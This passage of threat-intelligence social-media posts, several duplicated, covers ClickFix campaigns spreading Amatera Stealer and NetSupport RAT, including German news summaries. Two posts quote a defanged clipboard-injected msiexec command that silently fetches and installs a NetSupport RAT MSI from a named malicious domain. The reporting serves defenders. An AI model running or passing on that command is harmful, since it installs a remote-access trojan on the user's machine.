    Related phishing activity involves XWorm, Cephas kits, SmartApeSG, and Tycoon 2FA.

    Thoughts on this growing reliance on execution through supposedly “trusted” system tools?

    💬 Share your perspective
    👍 Follow us for more clear, unbiased threat reporting

    #Infosec #CyberSecurity #ClickFix #AmateraStealer #NetSupportRAT #MalwareAnalysis #ThreatIntel #MaaS #PhishingKits #SecurityResearch

  25. Neue EVALUSION‑ClickFix‑Kampagne:
    Amatera‑Stealer und NetSupport‑RAT werden verbreitet

    Cyber‑Security‑Forscher von eSentire haben eine EVALUSION genannte Malware‑Kampagne entdeckt, die das mittlerweile weit verbreitete ClickFix‑Social‑Engineering‑Muster nutzt, um den Amatera Stealer und das NetSupport RAT zu installieren.

    Mehr: maniabel.work/archiv/265

    #ClickFix #AmateraStealer #NetSupportRAT, infosec #infosecnews #BeDiS

  26. Neue EVALUSION‑ClickFix‑Kampagne:
    Amatera‑Stealer und NetSupport‑RAT werden verbreitet

    Cyber‑Security‑Forscher von eSentire haben eine EVALUSION genannte Malware‑Kampagne entdeckt, die das mittlerweile weit verbreitete ClickFix‑Social‑Engineering‑Muster nutzt, um den Amatera Stealer und das NetSupport RAT zu installieren.

    Mehr: maniabel.work/archiv/265

    #ClickFix #AmateraStealer #NetSupportRAT, infosec #infosecnews #BeDiS

  27. Neue EVALUSION‑ClickFix‑Kampagne:
    Amatera‑Stealer und NetSupport‑RAT werden verbreitet

    Cyber‑Security‑Forscher von eSentire haben eine EVALUSION genannte Malware‑Kampagne entdeckt, die das mittlerweile weit verbreitete ClickFix‑Social‑Engineering‑Muster nutzt, um den Amatera Stealer und das NetSupport RAT zu installieren.

    Mehr: maniabel.work/archiv/265

    #ClickFix #AmateraStealer #NetSupportRAT, infosec #infosecnews #BeDiS

  28. 2025-09-22 (Monday): #SmartApeSG using #FileFix style #ClickFix technique on its fake CAPTCHA page.

    While #KongTuke has reportedly used FileFix, this is the first time I've seen it from SmartApeSG sites.

    #clipboardhijacking Script injected into clipboard:

    msiexec /i hxxps[:]//founderevo[.]com/res/velvet ISLANDABSTRACT=surgewarfare.bat /qn

    The downloaded file is an MSI for #NetSupportRAT

    virustotal.com/gui/file/958586

  29. 2025-09-22 (Monday): #SmartApeSG using #FileFix style #ClickFix technique on its fake CAPTCHA page.

    While #KongTuke has reportedly used FileFix, this is the first time I've seen it from SmartApeSG sites.

    #clipboardhijacking Script injected into clipboard:

    msiexec /i hxxps[:]//founderevo[.]com/res/velvet ISLANDABSTRACT=surgewarfare.bat /qn

    The downloaded file is an MSI for #NetSupportRAT

    virustotal.com/gui/file/958586